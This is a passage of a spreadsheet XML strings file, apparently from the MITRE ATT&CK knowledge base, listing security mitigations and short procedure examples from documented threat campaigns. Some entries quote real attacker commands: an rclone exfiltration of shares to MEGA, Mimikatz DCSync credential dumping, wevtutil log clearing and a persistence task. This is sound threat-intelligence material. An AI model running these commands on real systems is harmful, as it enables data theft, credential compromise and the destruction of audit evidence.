    <t>Enforce role-based access control to limit accounts to the least privileges they require. A Cloud Access Security Broker (CASB) can be used to set usage policies and manage user permissions on cloud applications to prevent access to application access tokens. In Kubernetes applications, set “automountServiceAccountToken: false” in the YAML specification of pods that do not require access to service account tokens.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Limit user access to system utilities such as 'systemctl' to only users who have a legitimate need.</t>
  </si>
  <si>
    <t>Limit user access to system utilities such as 'systemctl' or 'systemd-run' to users who have a legitimate need.</t>
  </si>
  <si>
    <t>Limit user account and IAM policies to the least privileges required. Consider using temporary credentials for accounts that are only valid for a certain period of time to reduce the effectiveness of compromised accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. In Office 365 environments, partner relationships and roles can be viewed under the “Partner Relationships” page.(Citation: Office 365 Partner Relationships)
</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>Regularly audit user accounts for activity and deactivate or remove any that are no longer needed.</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify the web directory.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)</t>
  </si>
  <si>
    <t>By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI.</t>
  </si>
  <si>
    <t>By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.</t>
  </si>
  <si>
    <t xml:space="preserve">Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. </t>
  </si>
  <si>
    <t>Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.</t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized privileged users can create and modify XDG autostart entries.</t>
  </si>
  <si>
    <t>Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to intercept HTTPS traffic. Certificate errors may arise when the application’s certificate does not match the one expected by the host.</t>
  </si>
  <si>
    <t xml:space="preserve">
Close out all browser sessions when finished using them to prevent any potentially malicious extensions from continuing to run.</t>
  </si>
  <si>
    <t>Close all browser sessions regularly and when they are no longer needed.</t>
  </si>
  <si>
    <t>Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.</t>
  </si>
  <si>
    <t>Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in code repositories.</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in Confluence repositories.</t>
  </si>
  <si>
    <t>Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers.</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in repositories.</t>
  </si>
  <si>
    <t>Train users to look for double extensions in filenames, and in general use training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.</t>
  </si>
  <si>
    <t>Use user training as a way to bring awareness and raise suspicion for potentially malicious events and dialog boxes (ex: Office documents prompting for credentials).</t>
  </si>
  <si>
    <t>Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.</t>
  </si>
  <si>
    <t>Train users to be aware of the existence of malicious images and how to avoid deploying instances and containers from them.</t>
  </si>
  <si>
    <t>Remove smart cards when not in use.</t>
  </si>
  <si>
    <t>Train users to only accept 2FA/MFA requests from login attempts they initiated, to review source location of the login attempt prompting the 2FA/MFA requests, and to report suspicious/unsolicited prompts.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and phishing emails.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing attempts.</t>
  </si>
  <si>
    <t>Holding the Shift key while logging in prevents apps from opening automatically.(Citation: Re-Open windows on Mac)</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in SharePoint repositories.</t>
  </si>
  <si>
    <t>Have a strict approval policy for use of deployment systems.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing emails.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing attempts. Additionally, users may perform visual checks of the domains they visit; however, homographs in ASCII and in IDN domains may render manual checks difficult. Phishing training and other cybersecurity training may raise awareness to check URLs before visiting the sites.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing emails with malicious links which includes phishing for consent with OAuth 2.0. Additionally, users may perform visual checks of the domains they visit; however, homographs in ASCII and in IDN domains may render manual checks difficult. Phishing training and other cybersecurity training may raise awareness to check URLs before visiting the sites.</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing messages with malicious links.</t>
  </si>
  <si>
    <t>Users need to be trained to not authorize third-party applications they don’t recognize. The user should pay particular attention to the redirect URL: if the URL is a misspelled or convoluted sequence of words related to an expected service or SaaS application, the website is likely trying to spoof a legitimate service. Users should also be cautious about the permissions they are granting to apps. For example, offline access and access to read emails should excite higher suspicions because adversaries can utilize SaaS APIs to discover credentials and other sensitive communications.</t>
  </si>
  <si>
    <t>Train users to identify aspects of phishing attempts where they're asked to enter credentials into a site that has the incorrect domain for the application they are logging into.</t>
  </si>
  <si>
    <t>Train users to identify social engineering techniques and spearphishing emails that could be used to deliver malicious documents.</t>
  </si>
  <si>
    <t>Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>Regularly scan the internal network for available services to identify new and potentially vulnerable services.</t>
  </si>
  <si>
    <t>(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) used an updated version of [Crimson](https://attack.mitre.org/software/S0115).(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used a custom VM-based payload loader named [CostaBricks](https://attack.mitre.org/software/S0614).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used the 64-bit backdoor loader [PS1](https://attack.mitre.org/software/S0613).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)'s `Invoke-ReflectivePEInjection` module.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used [PsExec](https://attack.mitre.org/software/S0029).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used [SombRAT](https://attack.mitre.org/software/S0615) in conjuction with [CostaBricks](https://attack.mitre.org/software/S0614) and [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used C2 servers managed through [Tor](https://attack.mitre.org/software/S0183).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001) the threat actors used [Empire](https://attack.mitre.org/software/S0363) for discovery.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [Chinoxy](https://attack.mitre.org/software/S1041) was used to gain persistence and deploy other malware components.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, the [FunnyDream](https://attack.mitre.org/software/S1044) backdoor was used to execute multiple components and exfiltrate files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007) the threat actors used a customized version of [PcShare](https://attack.mitre.org/software/S1050).(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [ccf32](https://attack.mitre.org/software/S1043) was used to collect data.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors deployed [ASPXSpy](https://attack.mitre.org/software/S0073) on compromised web servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [PsExec](https://attack.mitre.org/software/S0029) to remotely execute droppers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [at](https://attack.mitre.org/software/S0110) to execute droppers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [gsecdump](https://attack.mitre.org/software/S0008) to dump account hashes.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to generate Trojan variants, control victim machines, and exfiltrate data.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>[Operation Honeybee](https://attack.mitre.org/campaigns/C0006) included the use of an upgraded version of [SYSCON](https://attack.mitre.org/software/S0464).(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During the investigation of [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), security researchers identified [Rising Sun](https://attack.mitre.org/software/S0448) in 87 organizations across the globe and subsequently discovered three variants.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [BloodHound](https://attack.mitre.org/software/S0521) discover trust between domains.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used `smbexec.py` and `psexec.py` from [Impacket](https://attack.mitre.org/software/S0357) for lateral movement.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002) with the `privilege::debug` and `lsadump::dcsync /all` flags to dump account credentials.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)’s `Invoke-Kerberoast` module to bruteforce passwords and retrieve encrypted service tickets.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PsExec](https://attack.mitre.org/software/S0029) to interact with other systems inside the internal network.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Tor](https://attack.mitre.org/software/S0183) exit nodes to execute commands.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Wevtutil](https://attack.mitre.org/software/S0645) to delete system and security event logs with `wevtutil cl system` and `wevtutil cl security`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [dsquery](https://attack.mitre.org/software/S0105) to retrieve all subnets in the Active Directory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [netstat](https://attack.mitre.org/software/S0104) to identify specific ports.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors downloaded tools and malware onto a compromised host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors used unique malware, including [SUGARUSH](https://attack.mitre.org/software/S1049) and [SUGARDUMP](https://attack.mitre.org/software/S1042).(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022) </t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) established SSL certificates on the typo-squatted domains the group registered.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) registered domains likely designed to appear relevant to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on a student target to open a malicious document delivered via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on student targets to click on a malicious link sent via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent malicious attachments via email to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) </t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent emails containing a malicious link to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) hosted malicious documents on domains registered by the group.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) </t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) used malicious VBA macros within a lure document as part of the [Crimson](https://attack.mitre.org/software/S0115) malware installation process onto a compromised host.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used DLL files that had invalid certificates.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Conti](https://attack.mitre.org/software/S0575) ransomware to encrypt a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors limited [Rclone](https://attack.mitre.org/software/S1040)'s bandwidth setting during exfiltration.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained files and data from the compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors collected files from network shared drives prior to network encryption.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the [Rclone](https://attack.mitre.org/software/S1040) command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors downloaded additional tools and files onto a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used WMI to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto additional hosts within a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors relied on users to enable macros within a malicious Microsoft Word document.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) and [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors executed the PowerView ShareFinder module to identify open shares.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used Base64-encoded strings.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors employed code that used `regsvr32` for execution.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors installed the AnyDesk remote desktop application onto the compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used RDP to access specific network hosts of interest.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net view /all time` to gather the local time of a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained a variety of tools, including [AdFind](https://attack.mitre.org/software/S0552),  AnyDesk, and Process Hacker.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `cmd.exe` to execute commands and run malicious binaries.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `wmic` and `rundll32` to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto a target host.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors collected data and files from compromised networks.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>For [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors established domains, some of which appeared to spoof legitimate domains.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors downloaded malware and tools onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>For [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used custom malware, including [PS1](https://attack.mitre.org/software/S0613), [CostaBricks](https://attack.mitre.org/software/S0614), and [SombRAT](https://attack.mitre.org/software/S0615).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used a layer of proxies to manage C2 communications.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors employed nmap and pscan to scan target environments.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used scheduled tasks to download backdoor tools.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors obtained open source tools to use in their operations.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to automatically gather the username, domain name, machine name, and other system information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which was automatically sent back to the adversary's C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to gather various local system information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors downloaded files and tools onto a victim machine.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used MSbuild to execute an actor-created file.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors named a malicious scheduled task "WinUpdate" for persistence.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran encoded commands from the command line.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain a list of all running processes.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named "WinUpdate" (Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to determine if analysis tools were running on a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
